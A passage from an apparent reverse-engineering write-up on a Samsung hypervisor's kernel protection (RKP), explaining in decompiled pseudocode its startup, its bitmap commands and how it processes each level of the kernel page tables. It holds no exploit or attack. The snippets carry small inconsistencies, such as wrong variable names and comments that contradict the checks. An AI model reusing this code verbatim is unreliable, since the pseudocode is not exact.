  uh_log('L', "rkp_init.c", 183, "[*] HCR_EL2: %lx, SCTLR_EL2: %lx", get_hcr_el2(), get_sctlr_el2());
  uh_log('L', "rkp_init.c", 184, "[*] VTTBR_EL2: %lx, TTBR0_EL2: %lx", get_vttbr_el2(), get_ttbr0_el2());
  uh_log('L', "rkp_init.c", 185, "[*] MAIR_EL1: %lx, MAIR_EL2: %lx", get_mair_el1(), get_mair_el2());
  uh_log('L', "rkp_init.c", 186, "RKP Activated");
  return 0;
}

The rkp_set_kernel_rox function marks the kernel text region as TEXT in the phys_map and makes it read-only from the hypervisor. The swapper_pg_dir is made writable from the hypervisor, whereas the empty_zero_page is made read-only executable from the kernel. The kernel text is made executable, and the log region and dynamic heap regions are made read-only from the kernel.

int64_t rkp_paging_init() {
  // ...

  // Ensure the start of the kernel text is page-aligned.
  if (!TEXT || (TEXT & 0xfff) != 0) {
    uh_log('L', "rkp_paging.c", 637, "kernel text start is not aligned, stext : %p", TEXT);
    return -1;
  }
  // Ensure the end of the kernel text is page-aligned.
  if (!ETEXT || (ETEXT & 0xfff) != 0) {
    uh_log('L', "rkp_paging.c", 642, "kernel text end is not aligned, etext : %p", ETEXT);
    return -1;
  }
  // Ensure the kernel text section doesn't contain the base address.
  if (TEXT_PA <= get_base() && ETEXT_PA > get_base()) {
    return -1;
  }
  // Unmap the hypervisor memory from the second stage (to make it inaccessible to the kernel).
  if (s2_unmap(0x87000000, 0x200000)) {
    return -1;
  }
  // Set the kernel text section as `TEXT` in the physmap.
  if (rkp_phys_map_set_region(TEXT_PA, ETEXT - TEXT, TEXT) < 0) {
    uh_log('L', "rkp_paging.c", 435, "physmap set failed for kernel text");
    return -1;
  }
  // Set the kernel text section as read-only from the hypervisor.
  if (s1_map(TEXT_PA, ETEXT - TEXT, UNKN1 | READ)) {
    uh_log('L', "rkp_paging.c", 447, "Failed to make VMM S1 range RO");
    return -1;
  }
  // Ensure the `swapper_pg_dir` is not contained within the kernel text section.
  if (INIT_MM_PGD >= TEXT_PA && INIT_MM_PGD < ETEXT_PA) {
    uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
    return -1;
  }
  // Set the `swapper_pg_dir` as writable from the hypervisor.
  if (s1_map(INIT_MM_PGD, 0x1000, UNKN1 | WRITE | READ)) {
    uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
    return -1;
  }
  rkp_phys_map_lock(ZERO_PG_ADDR);
  // Set the `empty_zero_page` as read-only executable in the second stage.
  if (rkp_s2_page_change_permission(ZERO_PG_ADDR, 0 /* read-write */, 1 /* executable */, 1) < 0) {
    uh_log('L', "rkp_paging.c", 462, "Failed to make executable for empty_zero_page");
    return -1;
  }
  rkp_phys_map_unlock(ZERO_PG_ADDR);
  // Make the kernel text section executable for the kernel (note the 0 given as argument).
  if (rkp_set_kernel_rox(0 /* read-write */)) {
    return -1;
  }
  // Set the log region read-only in the second stage.
  if (rkp_s2_range_change_permission(0x87100000, 0x87140000, 0x80 /* read-only */, 1 /* executable */, 1) < 0) {
    uh_log('L', "rkp_paging.c", 667, "Failed to make UH_LOG region RO");
    return -1;
  }
  // Ensure the dynamic heap has been initialized.
  if (!uh_state.dynamic_heap_inited) {
    return 0;
  }
  // Set the dynamic heap region as read-only in the second stage.
  if (rkp_s2_range_change_permission(uh_state.dynamic_heap_base,
                                     uh_state.dynamic_heap_base + uh_state.dynamic_heap_size, 0x80 /* read-only */,
                                     1 /* executable */, 1) < 0) {
    uh_log('L', "rkp_paging.c", 685, "Failed to make dynamic_heap region RO");
    return -1;
  }
  return 0;
}

The rkp_set_kernel_rox function makes the kernel text and rodata sections executable in the second stage, and depending on the access argument, either writable or read-only. When the function is first called, the argument is 0, but it is called again later with 0x80. It also updates the ro_bitmap to mark the kernel rodata section pages as read-only (which is different from the actual page tables).

int64_t rkp_set_kernel_rox(int64_t access) {
  // ...

  // Set the kernel text and rodata sections as executable.
  erodata_pa = rkp_get_pa(ERODATA);
  if (rkp_s2_range_change_permission(TEXT_PA, erodata_pa, access, 1 /* executable */, 1) < 0) {
    uh_log('L', "rkp_paging.c", 392, "Failed to make Kernel range ROX");
    return -1;
  }
  // If the kernel text and rodata sections are read-only in the second stage, return here.
  if (access) {
    return 0;
  }
  // Ensure the end of the kernel text and rodata sections are page-aligned.
  if (((erodata_pa | ETEXT_PA) & 0xfff) != 0) {
    uh_log('L', "rkp_paging.c", 158, "start or end addr is not aligned, %p - %p", ETEXT_PA, erodata_pa);
    return 0;
  }
  // Ensure the end of the kernel text is before the end of the rodata section.
  if (ETEXT_PA > erodata_pa) {
    uh_log('L', "rkp_paging.c", 163, "start addr is bigger than end addr %p, %p", ETEXT_PA, erodata_pa);
    return 0;
  }
  // Mark all the pages belonging to the kernel rodata as read-only in the `ro_bitmap`.
  paddr = ETEXT_PA;
  while (sparsemap_set_value_addr(&uh_state.ro_bitmap, addr, 1) >= 0) {
    paddr += 0x1000;
    if (paddr >= erodata_pa) {
      return 0;
    }
    uh_log('L', "rkp_paging.c", 171, "set_pgt_bitmap fail, %p", paddr);
  }
  return 0;
}

We mentioned that, after rkp_paging_init, rkp_start also calls rkp_l1pgt_process_table to process the page tables. We will detail the inner workings of this function later, but it is called with the value of the TTBR0_EL1 register and mainly makes its 3 levels of tables read-only.

RKP Deferred Start

On the kernel side, the second startup-related command is called in rkp_deferred_init.

static inline void rkp_deferred_init(void){
    uh_call(UH_APP_RKP, RKP_DEFERRED_START, 0, 0, 0, 0);
}

rkp_deferred_init itself is called by kernel_init, which is later in the kernel boot process.

static int __ref kernel_init(void *unused)
{
    // ...
    rkp_deferred_init();
    // ...
}

On the hypervisor side, the command handler rkp_cmd_deferred_start simply calls rkp_deferred_start. It sets the kernel text section as read-only in the second stage. It also processes the two kernel page tables, swapper_pg_dir and tramp_pg_dir, using the rkp_l1pgt_process_table function.

int64_t rkp_deferred_start() {
  uh_log('L', "rkp_init.c", 193, "DEFERRED INIT START");
  // Set the kernel text section as read-only in the second stage (here the argument is 0x80).
  if (rkp_set_kernel_rox(0x80 /* read-only */)) {
    return -1;
  }
  // Call a function that will process the `swapper_pg_dir` kernel page tables.
  if (rkp_l1pgt_process_table(INIT_MM_PGD, 0x1ffffff, 1) < 0) {
    uh_log('L', "rkp_init.c", 198, "Failed to make l1pgt processing");
    return -1;
  }
  // Call a function that will process the `tramp_pg_dir` kernel page tables.
  if (TRAMP_PGD && rkp_l1pgt_process_table(TRAMP_PGD, 0x1ffffff, 1) < 0) {
    uh_log('L', "rkp_init.c", 204, "Failed to make l1pgt processing");
    return -1;
  }
  // Mark RKP as deferred initialized.
  rkp_deferred_inited = 1;
  uh_log('L', "rkp_init.c", 217, "DEFERRED INIT IS DONE\n");
  memory_fini();
  return 0;
}

RKP Bitmaps

By digging in the kernel sources, we can find 3 more commands that are called by the kernel during startup.

Two of them are still called in rkp_init:

static void __init rkp_init(void)
{
    // ...
    rkp_s_bitmap_ro = (sparse_bitmap_for_kernel_t *)
        uh_call(UH_APP_RKP, RKP_GET_RO_BITMAP, 0, 0, 0, 0);
    rkp_s_bitmap_dbl = (sparse_bitmap_for_kernel_t *)
        uh_call(UH_APP_RKP, RKP_GET_DBL_BITMAP, 0, 0, 0, 0);
    // ...
}

The two commands RKP_GET_RO_BITMAP and RKP_GET_DBL_BITMAP take an instance of sparse_bitmap_for_kernel as an argument.

typedef struct sparse_bitmap_for_kernel {
    u64 start_addr;
    u64 end_addr;
    u64 maxn;
    char **map;
} sparse_bitmap_for_kernel_t;

These instances are rkp_s_bitmap_ro and rkp_s_bitmap_dbl, respectively.

sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;

They correspond to the hypervisor's ro_bitmap and dbl_bitmap sparsemaps, respectively.

The first one is used to check if a page has been set as read-only by the hypervisor, using the rkp_is_pg_protected function.

static inline u8 rkp_is_pg_protected(u64 va){
    return rkp_check_bitmap(__pa(va), rkp_s_bitmap_ro);
}

The second one is used to check if a page is already mapped and should not be mapped a second time, using the rkp_is_pg_dbl_mapped function.

static inline u8 rkp_is_pg_dbl_mapped(u64 pa){
    return rkp_check_bitmap(pa, rkp_s_bitmap_dbl);
}

Both functions call rkp_check_bitmap, which extracts the bit corresponding to the given physical address from the kernel bitmap.

#define SPARSE_UNIT_BIT (30)
#define SPARSE_UNIT_SIZE (1<<SPARSE_UNIT_BIT)
// ...

static inline u8 rkp_check_bitmap(u64 pa, sparse_bitmap_for_kernel_t *kernel_bitmap){
    u8 val;
    u64 offset, map_loc, bit_offset;
    char *map;

    if(!kernel_bitmap || !kernel_bitmap->map)
        return 0;

    offset = pa - kernel_bitmap->start_addr;
    map_loc = ((offset % SPARSE_UNIT_SIZE) / PAGE_SIZE) >> 3;
    bit_offset = ((offset % SPARSE_UNIT_SIZE) / PAGE_SIZE) % 8;

    if(kernel_bitmap->maxn <= (offset >> SPARSE_UNIT_BIT)) 
        return 0;

    map = kernel_bitmap->map[(offset >> SPARSE_UNIT_BIT)];
    if(!map)
        return 0;

    val = (u8)((*(u64 *)(&map[map_loc])) >> bit_offset) & ((u64)1);
    return val;
}

RKP_GET_RO_BITMAP and RKP_GET_DBL_BITMAP are handled similarly by the hypervisor, so we will only take a look at the handler for the first one.

rkp_cmd_get_ro_bitmap allocates a sparse_bitmap_for_kernel_t structure from the dynamic heap, zeroes it, and passes it to sparsemap_bitmap_kernel, which will fill it with the information in ro_bitmap. Then it puts the VA from the newly allocated structure into X0, and if a pointer was provided in X2, it will also put the VA there (using virt_to_phys_el1 to convert it).

int64_t rkp_cmd_get_ro_bitmap(saved_regs_t* regs) {
  // ...

  // This command cannot be called after RKP has been deferred initialized.
  if (rkp_deferred_inited) {
    return -1;
  }
  // Allocate the bitmap structure that will be returned to the kernel.
  bitmap = dynamic_heap_alloc(0x20, 0);
  if (!bitmap) {
    uh_log('L', "rkp.c", 302, "Fail alloc robitmap for kernel");
    return -1;
  }
  // Reset the newly allocated structure.
  memset(bitmap, 0, sizeof(sparse_bitmap_for_kernel_t));
  // Fill the kernel bitmap with the contents of the hypervisor `ro_bitmap`.
  res = sparsemap_bitmap_kernel(&uh_state.ro_bitmap, bitmap);
  if (res) {
    uh_log('L', "rkp.c", 309, "Fail sparse_map_bitmap_kernel");
    return res;
  }
  // Put the kernel bitmap VA in x0.
  regs->x0 = rkp_get_va(bitmap);
  // Put the kernel bitmap VA in the memory referenced by x2.
  if (regs->x2) {
    *virt_to_phys_el1(regs->x2) = regs->x0;
  }
  uh_log('L', "rkp.c", 322, "robitmap:%p", bitmap);
  return 0;
}

To see how the kernel bitmap is filled from the hypervisor sparsemap, let's look at sparsemap_bitmap_kernel. This function converts the PAs of all the sparsemap entries into VAs before copying them into the sparse_bitmap_for_kernel_t structure.

int64_t sparsemap_bitmap_kernel(sparsemap_t* map, sparse_bitmap_for_kernel_t* kernel_bitmap) {
  // ...

  // Sanity-check the arguments.
  if (!map || !kernel_bitmap) {
    return -1;
  }
  // Copy the start address, end address, and entries unchanged.
  kernel_bitmap->start_addr = map->start_addr;
  kernel_bitmap->end_addr = map->end_addr;
  kernel_bitmap->maxn = map->count;
  // Allocate from the dynamic heap an array to hold the entries addresses.
  bitmaps = dynamic_heap_alloc(8 * map->count, 0);
  if (!bitmaps) {
    uh_log('L', "sparsemap.c", 202, "kernel_bitmap does not allocated : %lu", map->count);
    return -1;
  }
  // Private sparsemaps are not allowed to be accessed by the kernel.
  if (map->private) {
    uh_log('L', "sparsemap.c", 206, "EL1 doesn't support to get private sparsemap");
    return -1;
  }
  // Zero out the allocated memory.
  memset(bitmaps, 0, 8 * map->count);
  // Save the VA of the allocated array.
  kernel_bitmap->map = (bitmaps - PHYS_OFFSET) | 0xffffffc000000000;
  index = 0;
  do {
    // Store the VAs of the entries into the array.
    bitmap = map->entries[index].bitmap;
    if (bitmap) {
      bitmaps[index] = (bitmap - PHYS_OFFSET) | 0xffffffc000000000;
    }
    ++index;
  } while (index < kernel_bitmap->maxn);
  return 0;
}

The third command is RKP_GET_RKP_GET_BUFFER_BITMAP, and it is called by the kernel in rkp_robuffer_init.

static void __init rkp_robuffer_init(void)
{
    rkp_s_bitmap_buffer = (sparse_bitmap_for_kernel_t *)
        uh_call(UH_APP_RKP, RKP_GET_RKP_GET_BUFFER_BITMAP, 0, 0, 0, 0);
}

It is also used to retrieve a sparsemap, this time the page_allocator.map.

sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;

It is used to check if a page comes from the hypervisor's pages allocator using the is_rkp_ro_page function.

static inline unsigned int is_rkp_ro_page(u64 va){
    return rkp_check_bitmap(__pa(va), rkp_s_bitmap_buffer);
}

The 3 commands used for retrieving a sparsemap are all called from the start_kernel function.

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    rkp_robuffer_init();
    // ...
    rkp_init();
    // ...
}

To summarize a little bit, these bitmaps are used by the kernel to check if some data is located on a page that is protected by RKP. If that is the case, the kernel knows it will need to call one of the RKP commands to modify it.

Page Tables Processing

We left it aside for a moment when we saw the calls to rkp_l1pgt_process_table in rkp_start and rkp_deferred_start, but now the time has come to detail how the kernel page tables are processed by the hypervisor. But first, a quick reminder about the layout of the kernel pages table.

Here is the Linux memory layout on Android (using 4 KB pages + 3 levels):

Start           End         Size        Use
-----------------------------------------------------------------------
0000000000000000    0000007fffffffff     512GB      user
ffffff8000000000    ffffffffffffffff     512GB      kernel

And here is the corresponding translation table lookup:

+--------+--------+--------+--------+--------+--------+--------+--------+
|63    56|55    48|47    40|39    32|31    24|23    16|15     8|7      0|
+--------+--------+--------+--------+--------+--------+--------+--------+
 |                 |         |         |         |         |
 |                 |         |         |         |         v
 |                 |         |         |         |   [11:0]  in-page offset
 |                 |         |         |         +-> [20:12] L3 index (PTE)
 |                 |         |         +-----------> [29:21] L2 index (PMD)
 |                 |         +---------------------> [38:30] L1 index (PUD)
 |                 +-------------------------------> [47:39] L0 index (PGD)
 +-------------------------------------------------> [63] TTBR0/1

So keep in mind for this section that we have PGD = PUD = VA[38:30] because we are only using 3 levels of AT.

Here are the formats of the level 0, level 1, and level 2 descriptors (that can be invalid, block or table descriptors):

image

Here are the formats of the level 3 descriptors (which can be invalid or page descriptors):

image

First Level

Processing of the first level tables (or PGDs) is done by the rkp_l1pgt_process_table function. A kernel PGD must be either swapper_pg_dir or tramp_pg_dir, unless we're prior to deferred initialization. The user PGD idmap_pg_dir is also never processed by this function.

If the PGD is being introduced, it is marked as L1 in the physmap and made read-only in the second stage. If the PGD is being retired, it is marked as FREE in the physmap and made writable in the second stage.

Finally, the descriptors of the PGD are processed: table descriptors are passed to the rkp_l2pgt_process_table function and have their PXN bit set if this was a user PGD, and block descriptors have their PXN bit set regardless of the PGD type.

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...

  // If this is a kernel PGD.
  if (high_bits == 0x1ffffff) {
    // It should be either `swapper_pg_dir` or `tramp_pg_dir`, or RKP should not be deferred initialized.
    if (pgd != INIT_MM_PGD && (!TRAMP_PGD || pgd != TRAMP_PGD) || rkp_deferred_inited) {
      // If it is not, we trigger a policy violation that results in a panic.
      rkp_policy_violation("only allowed on kerenl PGD or tramp PDG! l1t : %lx", pgd);
      return -1;
    }
  } else {
    // If it is a user PGD and it is `idmap_pg_dir`, return without procesing it.
    if (ID_MAP_PGD == pgd) {
      return 0;
    }
  }
  rkp_phys_map_lock(pgd);
  // If we are introducing this PGD.
  if (is_alloc) {
    // If it is already marked as a PGD in the physmap, return without processing it.
    if (is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // Compute the correct type (`KERNEL` or not).
    if (high_bits) {
      type = KERNEL | L1;
    } else {
      type = L1;
    }
    // And mark the PGD as such in the physmap.
    res = rkp_phys_map_set(pgd, type);
    if (res < 0) {
      rkp_phys_map_unlock(pgd);
      return res;
    }
    // Make the PGD read-only in the second stage.
    res = rkp_s2_page_change_permission(pgd, 0x80 /* read-only */, 0 /* non-executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l1pgt.c", 63, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 1);
      rkp_phys_map_unlock(pgd);
      return res;
    }
  }
  // If we are retiring this PGD.
  else {
    // If it is not marked as a PGD in the physmap, return without processing it.
    if (!is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // Mark the PGD as `FREE` in the physmap.
    res = rkp_phys_map_set(pgd, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(pgd);
      return res;
    }
    // Make the PGD writable in the second stage.
    res = rkp_s2_page_change_permission(pgd, 0 /* writable */, 1 /* executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l1pgt.c", 80, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 0);
      rkp_phys_map_unlock(pgd);
      return res;
    }
  }
  // Now iterate over each descriptor of the PGD.
  offset = 0;
  entry = 0;
  start_addr = high_bits << 39;
  do {
    desc_p = pgd + entry;
    desc = *desc_p;
    // Block descriptor (not a table, not invalid).
    if ((desc & 0b11) != 0b11) {
      if (desc) {
        // Make the memory non executable at EL1.
        set_pxn_bit_of_desc(desc_p, 1);
      }
    }
    // Table descriptor.
    else {
      addr = start_addr & 0xffffff803fffffff | offset;
      // Call rkp_l2pgt_process_table to process the PMD.
      res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
      // Make the memory non executable at EL1 for user PGDs.
      if (!(start_addr >> 39)) {
        set_pxn_bit_of_desc(desc_p, 1);
      }
    }
    entry += 8;
    offset += 0x40000000;
    start_addr = addr;
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

Second Level

Processing of the second level tables (or PMDs) is done by the rkp_l2pgt_process_table function. If the first user PMD given to this function was not allocated from the hypervisor page allocator, then user PMDs will no longer be processed.

If the PMD is being introduced, it is marked as L2 in the physmap, and made read-only in the second stage. Kernel PMDs are never allowed to be retired. If the user PMDs is being retired, it is marked as FREE in the physmap and made writable in the second stage.

Finally, the descriptors of the PMD are processed: all descriptors are passed to the check_single_l2e function.

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...

  // If this is a user PMD.
  if (!(start_addr >> 39)) {
    // The first time this function is called, determine if the PMD was allocated by the hypervisor page allocator. The
    // default value of `pmd_allocated_by_rkp` is 0, 1 means "process the PMD", -1 means "don't process it".
    if (!pmd_allocated_by_rkp) {
      if (page_allocator_is_allocated(pmd) == 1) {
        pmd_allocated_by_rkp = 1;
      } else {
        pmd_allocated_by_rkp = -1;
      }
    }
    // If the PMD was not allocated by RKP, return without processing it.
    if (pmd_allocated_by_rkp == -1) {
      return 0;
    }
  }
  rkp_phys_map_lock(pmd);
  // If we are introducing this PMD.
  if (is_alloc) {
    // If it is not marked as a PMD in the physmap, return without processing it.
    if (is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    // Compute the correct type (`KERNEL` or not).
    if (start_addr >> 39) {
      type = KERNEL | L2;
    } else {
      type = L2;
    }
    // And mark the PMD as such in the physmap.
    res = rkp_phys_map_set(pmd, (start_addr >> 23) & 0xff80 | type);
    if (res < 0) {
      rkp_phys_map_unlock(pmd);
      return res;
    }
    // Make the PMD read-only in the second stage.
    res = rkp_s2_page_change_permission(pmd, 0x80 /* read-only */, 0 /* non-executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 98, "Process l2t failed, %lx, %d", pmd, 1);
      rkp_phys_map_unlock(pmd);
      return res;
    }
  }
  // If we are retiring this PMD.
  else {
    // If it is not marked as a PMD in the physmap, return without processing it.
    if (!is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // Kernel PMDs are not allowed to be retired.
    if (start_addr >= 0xffffff8000000000) {
      rkp_policy_violation("Never allow free kernel page table %lx", pmd);
    }
    // Also check that it is not marked `KERNEL` in the physmap.
    if (is_phys_map_kernel(pmd)) {
      rkp_policy_violation("Entry must not point to kernel page table %lx", pmd);
    }
    // Mark the PMD as `FREE` in the physmap.
    res = rkp_phys_map_set(pmd, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // Make the PMD writable in the second stage.
    res = rkp_s2_page_change_permission(pmd, 0 /* writable */, 1 /* executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 123, "Process l2t failed, %lx, %d", pmd, 0);
      rkp_phys_map_unlock(pgd);
      return 0;
    }
  }
  // Now iterate over each descriptor of the PMD.
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xffffffffc01fffff;
    // Call `check_single_l2e` on each descriptor.
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pgd);
  return res;
}

check_single_l2e processes each PMD descriptor. If the descriptor is mapping a VA that is executable, the PMD is not allowed to be retired. If it is being introduced, then the hypervisor will protect the next level table. If the VA is not executable, the PXN bit of the descriptor is set.

If the descriptor is a block descriptor, no further processing is performed. However, if it is a table descriptor, then the rkp_l3pgt_process_table function is called to process the next level table.

int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
  // ...

  // If the virtual address mapped by this descriptor is executable (it is in the `executable_regions` memlist).
  if (executable_regions_contains(start_addr, 2)) {
    // The PMD is not allowed to be retired, trigger a policy violation.
    if (!is_alloc) {
      uh_log('L', "rkp_l2pgt.c", 36, "RKP_61acb13b %lx, %lx", desc_p, *desc_p);
      uh_log('L', "rkp_l2pgt.c", 37, "RKP_4083e222 %lx, %d, %d", start_addr, (start_addr >> 30) & 0x1ff,
             (start_addr >> 21) & 0x1ff);
      rkp_policy_violation("RKP_d60f7274");
    }
    // The PMD is being allocated, set the protect flag (to protect the next level table).
    protect = 1;
  } else {
    // The virtual address is not executable, set the PXN bit of the descriptor.
    set_pxn_bit_of_desc(desc_p, 2);
    // Unset the protect flag (we don't need to protect the next level table).
    protect = 0;
  }
  // Get the descriptor type.
  desc = *desc_p;
  type = *desc & 0b11;
  // Block descriptor, return without processing it.
  if (type == 0b01) {
    return 0;
  }
  // Invalid descriptor, return without processing it.
  if (type != 0b11) {
    if (desc) {
      uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
    }
    return 0;
  }
  // Table descriptor, log if the PT needs to be protected.
  if (protect) {
    uh_log('L', "rkp_l2pgt.c", 56, "L3 table to be protected, %lx, %d, %d", desc, (start_addr >> 21) & 0x1ff,
           (start_addr >> 30) & 0x1ff);
  }
  // If the kernel PMD is being retired, log as well.
  if (!is_alloc && start_addr >= 0xffffff8000000000) {
    uh_log('L', "rkp_l2pgt.c", 58, "l2 table FREE-1 %lx, %d, %d", *desc_p, (start_addr >> 30) & 0x1ff,
           (start_addr >> 21) & 0x1ff);
    uh_log('L', "rkp_l2pgt.c", 59, "l2 table FREE-2 %lx, %d, %d", desc_p, 0x1ffffff, 0);
  }
  // Call rkp_l3pgt_process_table to process the PT.
  return rkp_l3pgt_process_table(*desc_p & 0xfffffffff000, start_addr, is_alloc, protect);
}

Third Level

Processing of the third level tables (or PTs) is done by the rkp_l3pgt_process_table function. If the PT maps the kernel text, the PTE of the kernel text start is saved into the stext_ptep global variable. If the PT doesn't need to be protected, the function returns without any processing.

If the PT is being introduced, it is marked as L3 in the physmap, and made read-only in the second stage. The descriptors of the PT are processed: invalid descriptors trigger violations, and descriptors mapping non executable VAs have their PXN bit set.

If the PT is being retired, it is marked as FREE in the physmap and a violation is triggered. If the violation doesn't panic (though it should after initialization since rkp_panic_on_violation is set), the PT is made writable in the second stage. The descriptors of the PT are processed: invalid descriptors trigger violations, and descriptors mapping executable VAs trigger violations.

int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
  // ...

  cs_enter(&l3pgt_lock);
  // If `stext_ptep` hasn't been set already, and this PT maps the kernel text (i.e. the first virtual address mapped
  // and the kernel text have the same PGD, PUD, PMD indexes), then set `stext_ptep` to the PTE of the kernel text
  // start.
  if (!stext_ptep && ((TEXT ^ start_addr) & 0x7fffe00000) == 0) {
    stext_ptep = pte + 8 * ((TEXT >> 12) & 0x1ff);
    uh_log('L', "rkp_l3pgt.c", 74, "set stext ptep %lx", stext_ptep);
  }
  cs_exit(&l3pgt_lock);
  // If we don't need to protect this PT, return without processing it.
  if (!protect) {
    return 0;
  }
  rkp_phys_map_lock(pte);
  // If we are introducing this PT.
  if (is_alloc) {
    // If it is not marked as a PT in the physmap, return without processing it.
    if (is_phys_map_l3(pte)) {
      uh_log('L', "rkp_l3pgt.c", 87, "Process l3t SKIP %lx, %d, %d", pte, 1, start_addr >> 39);
      rkp_phys_map_unlock(pte);
      return 0;
    }
    // Compute the correct type (`KERNEL` or not).
    if (start_addr >> 39) {
      type = KERNEL | L3;
    } else {
      type = L3;
    }
    // And mark the PT as such in the physmap.
    res = rkp_phys_map_set(pte, type);
    if (res < 0) {
      rkp_phys_map_unlock(pte);
      return res;
    }
    // Make the PT read-only in the second stage.
    res = rkp_s2_page_change_permission(pte, 0x80 /* read-only */, 0 /* non-executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 102, "Process l3t failed %lx, %d", pte, 1);
      rkp_phys_map_unlock(pte);
      return res;
    }
    // Now iterate over each descriptor of the PT.
    offset = 0;
    desc_p = pte;
    do {
      addr = offset | start_addr & 0xffffffffffe00fff;
      if (addr >> 39) {
        desc = *desc_p;
        if (desc) {
          // Invalid descriptor, trigger a violation.
          if ((desc & 0b11) != 0b11) {
            rkp_policy_violation("Invalid l3e, %lx, %lx, %d", desc, desc_p, 1);
          }
          // Page descriptor, if the virtual address mapped by this descriptor is not executable, then set the PXN bit.
          if (!executable_regions_contains(addr, 3)) {
            set_pxn_bit_of_desc(desc_p, 3);
          }
        }
      } else {
        uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1ff,
               (addr >> 21) & 0x1ff);
      }
      offset += 0x1000;
      ++desc_p;
    } while (offset != 0x200000);
  }
  // If we are retiring this PT.
  else {
    // If it is not marked as a PT in the physmap, return without processing it.
    if (!is_phys_map_l3(pte)) {
      uh_log('L', "rkp_l3pgt.c", 110, "Process l3t SKIP, %lx, %d, %d", pte, 0, start_addr >> 39);
      rkp_phys_map_unlock(pte);
      return 0;
    }
    // Mark the PT as `FREE` in the physmap.
    res = rkp_phys_map_set(pte, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(pte);
      return res;
    }
    // Protected PTs are not allowed to be retired, so trigger a violation. If we did not panic, continue.
    rkp_policy_violation("Free l3t not allowed, %lx, %d, %d", pte, 0, start_addr >> 39);
    // Make the PT writable in the second stage.
    res = rkp_s2_page_change_permission(pte, 0 /* writable */, 1 /* executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 127, "Process l3t failed, %lx, %d", pte, 0);
      rkp_phys_map_unlock(pte);
      return res;
    }
    // Now iterate over each descriptor of the PT.
    offset = 0;
    desc_p = pte;
    do {
      addr = offset | start_addr & 0xffffffffffe00fff;
      if (addr >> 39) {
        desc = *desc_p;
        if (desc) {
          // Invalid descriptor, trigger a violation.
          if ((desc & 0b11) != 0b11) {
            rkp_policy_violation("Invalid l3e, %lx, %lx, %d", *desc, desc_p, 0);
          }
          // Page descriptor, if the virtual address mapped by this descriptor is executable, trigger a violation.
          if (executable_regions_contains(addr, 3)) {
            rkp_policy_violation("RKP_b5438cb1");
          }
        }
      } else {
        uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1ff,
               (addr >> 21) & 0x1ff);
      }
      offset += 0x1000;
      ++desc_p;
    } while (offset != 0x200000);
  }
  rkp_phys_map_unlock(pte);
  return 0;
}

If functions processing the kernel page tables find something they consider a policy violation, they call rkp_policy_violation with a string that describes the violation as an argument. This function logs the message and calls uh_panic if rkp_panic_on_violation is set.

int64_t rkp_policy_violation(const char* message, ...) {
  // ...

  // Log the violation message and its arguments.
  res = rkp_log(0x4c, "rkp.c", 108, message, /* variable arguments */);
  // Panic if panic on violation is enabled.
  if (rkp_panic_on_violation) {
    uh_panic();
  }
  return res;
}

rkp_log is a wrapper around uh_log that adds the current time and CPU number to the message. It also calls bigdata_store_rkp_string to copy the formatted message to the analytics, or bigdata, region.

Overall State After Startup

This section serves as a reference of the overall state after startup (normal and deferred) is finished. We go over each of the internal structures of RKP, as well as the hypervisor-controlled page tables, and detail their content and where it was added or removed.

Memlist dynamic_regions

Memlist protected_ranges

Memlist page_allocator.list

Memlist executable_regions

  • initialized in rkp_start
  • TEXT-ETEXT added in rkp_start
  • TRAMP_VALIAS page added in rkp_start
  • (values are added in dynamic_load_ins)
  • (values are removed in dynamic_load_rm)

Memlist dynamic_load_regions

  • initialized in rkp_start
  • (values are added in dynamic_load_add_dynlist)
  • (values are removed in dynamic_load_rm_dynlist)

Sparsemap physmap (based on dynamic_regions)

Sparsemap ro_bitmap (based on dynamic_regions)

Sparsemap dbl_bitmap (based on dynamic_regions)

Sparsemap robuf/page_allocator.map (based on dynamic_regions)

Page tables of EL2 stage 1

Page tables of EL1 stage 2

RKP and KDP Commands

We have seen in the previous sections how RKP manages to take full control of the kernel page tables and what it does when it processes them. We will now see how this is used to protect critical kernel data, mainly by allocating it on read-only pages and requiring HVC to modify it.

Protecting Kernel Data

Global Variables

